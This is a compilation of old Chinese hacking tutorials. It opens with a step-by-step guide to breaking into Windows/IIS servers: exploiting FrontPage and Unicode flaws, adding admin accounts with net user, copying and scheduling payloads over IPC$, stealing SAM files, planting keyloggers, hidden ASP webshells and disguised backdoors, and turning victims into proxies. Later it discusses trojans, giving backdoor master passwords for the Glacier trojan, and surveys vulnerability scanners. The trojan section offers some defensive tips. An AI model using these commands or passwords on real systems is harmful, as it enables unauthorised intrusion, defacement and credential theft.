为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管注意文明用语的疏忽（为什么注意文明用语满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语网管和微软啊！ 具体做法： 1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行了。 2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。 3，接下来打开frontpage,(妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择“打开站点”，然后在文件夹框里写入 http://11.11.22.22（我习惯用这个做例子
基础知识（下）net user iusr_machinename cshu （把它的密码设为cshu） net localgroup administrators iusr_machinename /add（加入administrators组） 这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！ 熟悉一下net use 命令： net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接 copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘 net time \\11.11.22.22 看到了时间了，比如是8点 at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。 net use \\11.11.22.22 /delete 断开连接 应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了，admin是最高权限，所以没有限制的：） 是不是很简单？所以我是溢出是很厉害的攻击方法。 3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章） 总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。 首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。 1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。 拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。 2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！ 3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：） 4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！ 5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit. 6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。 总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思路，实际操作时需要具体处理，开动脑筋，把方法都结合起来。（是不是听起来有点玄？） 想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。 那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！ 这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu(cshu.51.net)也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们

我来说说我自己觉得最有用的几个项目： 1，探测----扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。 remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我） remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！ remote ftp sam -x 拿sam的，还是用最好的lc3来解吧！ frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点， http://ip就可以了！（http://不要忘） 此外还有一点变通，大家肯定读的懂的。 2，探测----高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。 3，工具----nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！ 总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：www.hack.co.za，有什么漏洞的话就去那里找找，你会有所收获的。 然后我想说说一些黑站的经验。 ☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。 上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！ 推荐他的最大原因便是----便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：） 最后对大家说一句，要是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧） ☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是无耻到了极点！！！！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！ 我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？ ☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令： net start termservice 启动win2k的终端控制 net start workstation 打开net use 功能 net start lanmanserver 打开ipc net start eventlog 启动日志（你不会那么傻吧！stop） net start schedule 打开计划(at) net start server 共享 还有很多，net命令里去找吧！ ☆打开telnet 1，远程去运行ntlm.exe，流光里有 2，net stop telnet 3, net start telnet ☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！ 至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就最好了！ ☆代理问题。我推荐大家自己去做代理，控制了一台机器后，用snake前辈写的skserver去做个sock5。 具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。 做好了sock5，我们可以上oicq，下棋都用它，sock5代理可是很少见的哦！ 要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最最好的的代理站点，怕死的朋友千万不要错过。 最后说说一些对于菜鸟同志的建议： 不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的…… 不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。 不要和被你黑的网管过多接触，前车之鉴哦。 对于一台好机器要做好后门，不要轻易失去它。 想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和网络游戏吧！ 实践是最好的教程，再次重申！ 应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。 编程技术……好像太难了，不过再难也要学。 想不出来了……………… 好了，我们的菜鸟操终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗?

黑客常用兵器之木马篇（上）“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢?” 　　“木马也是种武器，也是远程控制。” 　　“既然是远程控制，为什么要叫做木马？” 　　“因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的QQ，你的QQ就要和你离别。” 　　“如果它钩住我的机器，我就和整个网络离别了?” 　　“是的。” 　　“你为什么要用如此残酷的武器?” 　　“因为我不愿被人强迫与我所爱的人离别。” 　　“我明白你的意思了。” 　　“你真的明白?” 　　“你用木马，只不过为了要相聚。” 　　“是的。” 　　一 　　在众多的黑客武器中特洛伊木马（Trojan horse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究网络安全的高手，都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。 　　“木马既然如此有效，为何在Hacker兵器谱中排名靠后？” 　　“因为使用木马往往不是很光明正大。” 　　“哦？为何？” 　　“在使用木马的人群中菜鸟黑客居多，他们往往接触网络不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。” 　　“但如此一来木马的名声不就随之降低了吗？” 　　“是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。” 　　“不过木马在很多人的眼中仍然是一等一的绝好兵器。” 在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的，但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对Windows NT来说是致命的，就Windows NT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。 　　而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有Web Server才能够提起他们的胃口，那是一种来自深层感官的刺激。 　　通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。 　　二 　　“你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种方法摧毁它。 　　“你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。” 　　“这是一个什么样的弱点那？竟然如此致命？” 　　“呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。” 　　“什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？” 　　“呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。” 　　“噢？万能密码？” 　　“通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码： 　　2.2版：Can you speak Chinese? 　　2.2版：05181977 　　3.0版：yzkzero! 　　4.0版：05181977 　　3.0版：yzkzero.51.net 　　3.0版：yzkzero! 　　3.1-netbug版密码: 123456!@ 　　2.2杀手专版：05181977 　　2.2杀手专版：dzq20000! 你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？” 　　“真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。” 　　“此外冰河还存在着两个严重的漏洞： 　　漏洞一：不需要密码远程运行本地文件漏洞。 　　具体的操作方法如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client，进入文件管理器，展开“我的电脑”选中任一个本地文件按右键弹出选择菜单，选择“远程打开”这时会报告口令错误，但是文件一样能上传并运行。 　　任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。 　　漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。” 　　“当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。” 　　三 　　木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。 　　“在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。” 　　“众多的目录中为何选择这两个目录？” 　　“呵呵，当然是为了便于隐蔽。通常这几个目录为计算机的系统目录，其中的文件数量多而繁杂，很不容易辨别哪些是良性程序哪些是恶性程序，即便高手往往也会有失误删除的情况。而且，即便放置在系统目录下，就多数为重要的文件，这些文件的误删除往往会直接导致系统严重的瘫痪。” 　　“原来如此。” 　　“前辈，木马冰河是否也做了这些手脚？” 　　“这是自然，木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先，冰河会在你的注册表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 键值中加上了\kernl32.exe(是系统目录)， 　　§c:\改动前的RUN下 　　默认="" 　　§c:\改动后的RUN下 　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" 　　§c:\改动前RunServices下 　　默认="" 　　§c:\改动后RunServices下 　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" 　　§c:\改动前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： 　　默认="Notepad.exe %1" 　　§c:\改动后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： 　　默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1" 可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服务器端的编制是加密的，没法简单的通过改注册表得到或换掉。另外值得一提的是，即便你删除了这个键值，也并非平安大吉，冰河还会随时出来给你捣乱，主要因为冰河的服务端也会在c:\windows目录下生成一个叫 sysexplr.exe文件，当然这个目录会随你windows的安装目录变化而变化。

黑客常用兵器之木马篇（下）　五 　　“哈哈，你可知道除了冰河这样的木马经常使用的隐身技术外，更新、更隐蔽的方法已经出现，这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同，它基本上摆脱了原有的木马模式―监听端口，而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是：系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它，也不能用kill进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状，而一旦木马的控制端向被控端发出特定的信息后，隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马，甚是隐蔽，我们上面的那些方法根本不会对这类木马起作用。 　　“可是前辈说的这种木马晚生并没有见到啊。” 笨蛋！你没有见过，你怎么知道我老人家也没有见过？告诉你我已经看到了一个更加巧妙的木马，它就是Share。运行Share木马之前，我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件DiskState记录了起来，这个监控软件使用128bit MD5的技术来捕获所有文件的状态，系统中的任何文件的变动都逃不过他的监视，这个软件均会将它们一一指出。” 　　“前辈我这里第一次运行Share后，系统好像没有动静，使用Dllshow（内存进程察看软件）观看内存进程，似乎也没有太大的变化。一般木马都会马上在内存驻留的，或许此木马修改了硬盘上的文件。” 　　“好，那么你就接着用DiskState比较运行share.exe前后的记录。” 　　“程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化，并没有其他文件的增加和修改。” 　　“系统中的applog目录里面存放了所有应用程序函数和程序调用的情况，而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看，它的调用过程是什么？” 　　“调用过程如下： 　　c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL" 　　c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL" 　　c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL" 　　c15d4fd0 2623 "C:\WINDOWS\WIN.INI" 　　c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL" 　　c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL" 　　c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE" 　　c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL" 　　但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢？如果木马想要进行网络通讯，是会使用一些socket调用的。” 　　“那么接着你再观察注册表的变化。” 　　“好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面，多了几个键值，分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其内部键值如下： 　　"Flags"=dword:00000302 　　"Type"=dword:00000000 　　"Path"="A:\\" 《-----路径是A到F 　　"Parm2enc"=hex: 　　"Parm1enc"=hex: 　　"Remark"="黑客帝国" 　　” 　　“这就对了，然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。” 　　“啊！居然把我的C盘目录文件显示出来了。” 　　“现在你把CJT_C$改成matrix然后重启计算机，接着在浏览器的地址栏输入\\111.111.111.1\matrix。” 　　“前辈也显示C盘目录文件了，很奇怪的是，在我的电脑里面硬盘看上去并没有共享啊？” 　　“哈哈，那你再把"Flags"=dword:00000302的302改成402，reboot计算机。” 　　“嘻嘻，硬盘共享已显示出来了。那么如何防止这种木马那？” “哈哈哈哈，这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部删掉。如果你还放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 网络上的文件与打印机共享，虚拟设备驱动程序）删掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER键值删掉。这样就可以了。另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的〖系统文件检查器〗，通过〖开始菜单〗－〖程序〗－〖附件〗－〖系统工具〗－〖系统信息〗－〖工具〗可以运行〖系统文件检查器〗，用〖系统文件检查器〗可检测操作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了，就有可能是木马，提取改动过的文件可以保证你的系统安全和稳定。” 　　六 　　“此外很多人中木马都会采用如下手段： 　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能让你轻信的人，然后想方设法的骗你点他发给你的木马。 　　2．把木马用工具和其它的软件捆绑在一起，然后在对文件名字进行修改，然后修改图标，利用这些虚假的伪装欺骗麻痹大意的人。 　　3．另外一种方法就是把木马伪装好后，放在软件下载站中，着收渔翁之利。 　　所以我这里提醒你一些常见的问题，首先是不要随便从小的个人网站上下载软件，要下也要到比较有名、比较有信誉的站点，通常这些网站的软件比较安全。其次不要过于相信别人，不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等，而且多注意些安全方面的信息。再者就是改掉windows关于隐藏文件后缀名的默认设置，这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是，如果有一天你突然发现自己的计算机硬盘莫名其妙的工作，或者在没有打开任何连接的情况下，猫还在眨眼睛，就立刻断线，进行木马的搜索。”
黑客常用兵器之扫面篇（上）刀，兵器谱上排名第六。 　　刀； 　　一把好刀，光亮如雪； 　　刃； 　　一抹利刃，吹发即断； 　　黑客手中的扫描器如同刺客手中之刀，杀人、保命；攻击、补漏。 　　如果一个黑客手中没有一两个扫描器，那么他算不上是一个黑客，至少他是一个手里没有“刀”的黑客。没有“刀”的黑客是难以生存的……】 　　“前辈，您为何如此看好扫描器？为什么黑客必须要有扫描器？” 　　“后生，你上次木马害我不浅，你这次又像搞什么花样？” 　　“上次小生只是跟前辈开了一个玩笑，还望前辈见谅。” 　　“罢了，我老人家还不止于和你如此一般见识。此次你又有什么不清楚的？” 　　“我不太清楚扫描器为何会像您所说的有如此大的威力，扫描器在黑客攻击中能起到什么作用？” 　　“看来你现在也是一个手里没有刀的黑客，扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客，他们就会很少有人在对那些无知的个人用户感兴趣，注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞，或者服务器相关软件的漏洞。对于传统的手工查找来说，不但查找漏洞的速度过于缓慢，而且多数情况下只能针对某一个特定的漏洞，感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具，通过它们，黑客可以根据自己的带宽和系统情况，以他们自己喜欢的速度和方式来快速的寻找系统漏洞，而且这多数扫描器可以同时扫描多种漏洞，很容易找到系统的漏洞和弱点，此时黑客就可以根据扫描器提供的漏洞报告和信息，采用合适的攻击方法对目标给以致命的一击。” 　　“前辈，那我如何找到扫描器，平时我好像很少接触到这些东西啊。” 　　“呵呵，你用过小榕的流光系列吗？” 　　“这个当然是接触过了。” 　　“其实小榕的流光就是一款结合强大扫描功能的软件，只不过他在流光中加入了一些攻击和破解成份。” “扫描器果然强大，我就曾用流光攻破过许多的黄色和反动网站，特别是他的FTP和新加入的SQLCMD功能，非常的强大。而且界面非常的友好，让我这种菜鸟用户很容易上手。” 　　“你说的不错，但是虽然小榕的流光非常出色，并兼备强大的破解和攻击成份，但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解，攻击性很强，没有太多的对目标系统扫描后的分析报告，所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。” 　　“那么在前辈的眼中，什么样的软件是一个强大的扫描软件，什么样的扫描器才能成为黑客手中的屠龙刀？” 　　“一个好的扫描器必须有简洁和易于使用的操作界面，强大的分析和扫描信息范围，对最新漏洞的扫描判断能力（也就是通常所说的升级概念），详细的分析结果报告和对漏洞的描述与对策。这样的“刀”才能算的上是黑客手中的一把宝刀。” 　　“前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢？” 　　“说道当今网络安全界流行的扫描器，其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描，而且能够生成比较详细的扫描报告，应该说是先进最好的扫描器了。” 　　“前辈这个扫描器我可以从什么地方下载？” 　　“无知！商业扫描器，当然是不能免费下载的了，你要花钱去买！” 　　“还需要花钱啊，哪有没有不花钱的扫描器呢？” 　　“当然有了，扫描器是黑客必备的工具之一，要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS，还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner，与小榕的流光。” 　　“前辈说的这几种扫描器我只用过流光，我个人认为流光很出色，其他的扫描器也只有所耳闻，但不知道有什么特点，还请前辈赐教。” 　　“比起你用过的流光来说，ISS算得上是一个真正的管理员使用的系统扫描工具，首先它能扫描一些众所周知的系统漏洞和系统弱点，包括一些往往被用户忽略的问题，这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能，并且它不会允许非法访问，但是实际情况是ISS已经背离了它的初衷目的。” 　　“任何好的事物都有不利的一面，更何况一把刀，而且是把宝刀。” 　　“这话不错，ISS的确是安全界最为出色的扫描器，而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性，众多的UNIX的平台上都可以运行ISS，ISS的扫描时间和效率也是很快的，很适合于企业级的用户。” “前辈，我插一句话，虽然ISS足够强大，但是它毕竟不是免费的午餐，这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器？” 　　“扫描器庞大的家族中怎么会没有免费的，你听说过NMAP吗？” 　　“NMAP倒是有所耳闻，以前在许多安全网站上见到过这个名字，但是我不知道它是干什么用的一个东西。” 　　“NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP，TCP (connect)，TCP SYN(half open)，ftp proxy(bounce attack)，Reverse-ident，ICMP(ping sweep)，FIN，ACK sweep，Xmas Tree，SYN sweep，Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高，这是由于它采用的是“半开”的一种扫描方式，此外它提供的Stealth FIN，Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因，NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等，NMAP均可以实现，可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描，它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。总之它的强大是不言而喻的，如果你有一台联网的Linux或者UNIX计算机，那么你就可以去http://www.insecure.org/nmap/ 下载得到它。
黑客常用兵器之扫描篇（下）　　“前辈，我的系统使用的是Windows，您能不能介绍一些我这种菜鸟级黑客也能用的扫描器？当然前提是在Windows系统下运行啊。” 　　“既然这样，我想Cerberus Internet Scanner(CIS)可能比较合适与你，它主要运行在Windows NT和Windows2000的平台下面，当然它也主要是针对微软的Windows操作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的Windows友好界面，而且它提供进行扫描的安全问题也是通常在Windows中经常见到的，其中包括： 　　（1） WWW服务 　　（2） FTP服务 　　（3） MS SQL Server 数据库扫描 　　（4） NetBIOS 共享扫描 　　（5） 注册表设置 　　（6） NT服务漏洞 　　（7） SMTP服务扫描 　　（8） POP3服务扫描 　　（9） RPC服务扫描 　　（10） 端口映射 　　（11） Finger服务 　　（12） DNS安全扫描 　　（13） 浏览器安全等 　　在CIS中，它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的操作方法也是非常的容易，你只需要输入目标服务器的地址，然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在http://www.cerberus-infosec.co.uk/ 下载获得。” “这款扫描器的功能是否太过于简单了哪？我感觉它比起前几个您说的那些扫描器，功能过于少了，而且没有流光那么有成效。” 　　“SATAN作为扫描器的鼻祖可能很适合你，由于它采用的是一个Perl的内核，通过PERL调用大量的C语言的检测工具对目标网站进行分析，所以你打开浏览器用IE方式就可以直接操作，使用也相对简单，我就不在这里介绍他浪费时间了。 　　作为黑客的利刃，国产的CGI & Web Scanner也是一个不错的扫描器，这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。” 　　“动态网站？” 　　“对，动态网站。随着网站设计的日趋复杂化，网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发，这些东西大大地减轻了网站的维护和更新工作量，但是也正是这些技术，导致了大量的安全问题，特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多，导致了大量的系统漏洞的出现。而CGI & Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。 　　CGI & Web Scanner的主要功能有： 　　（1） 检测203个已知的CGI漏洞 　　（2） 通过HTTPD辨认服务器类型 　　（3） 有更新漏洞的功能 　　（4） Microsoft SQL Server DOS检测 　　（5） Httpd Overflow检测 　　（6） IIS Hack检测 　　（7） ASP检测 　　（8） DOT 漏洞检测 　　而且它可以多线程扫描，并对常见的D.O.S（拒绝服务攻击）和Overflow等也进行探测，很适合初级杀手作为武器。至于你关心的使用方法，就更为简单了，输入目标服务器的IP地址，选择需要扫描的漏洞种类点击扫描按键，就开始了。” 　　“没有想到国产扫描器还有如此优秀的！” 　　